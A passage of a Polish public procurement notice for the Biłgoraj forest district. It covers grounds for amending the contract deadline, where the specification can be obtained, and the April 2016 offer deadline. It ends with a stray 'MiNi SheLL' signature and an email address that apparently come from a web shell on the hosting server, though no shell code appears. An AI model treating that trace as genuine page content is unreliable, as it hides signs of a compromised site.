5)	zaistnienia przeszkód spowodowanych siłą wyższą tj. zdarzeniem zewnętrznym niemożliwym do przewidzenia i niemożliwym do zapobieżenia. Za okoliczności siły wyższej strony uznają: powódź, trzęsienia ziemi, działania wojenne, ogłoszenie stanu wojennego, stanu klęski żywiołowej,
6)	zmiany przepisów prawa mających wpływ na termin wykonania robót lub sposobu prowadzenia robót,
7)	warunków atmosferycznych negatywnie wpływających na jakość lub trwałość wykonania przedmiotu umowy, a w szczególności zalanie terenu wodą,
8)	nieprzewidzianych wykopalisk uniemożliwiających wykonywanie robót,
9)	przerw w realizacji robót w przypadku odkrycia niewypałów, niewybuchów,
10)	zakazu dalszego prowadzenia robót wynikającego z prawomocnego orzeczenia sądowego lub administracyjnego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_lublin/nadl_bilgoraj/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 23-400 Biłgoraj, ul. Zamojska 96..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2016 godzina 09:00, miejsce: Siedziba Nadleśnictwa Biłgoraj, 23-400 Biłgoraj, pok. nr 15 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com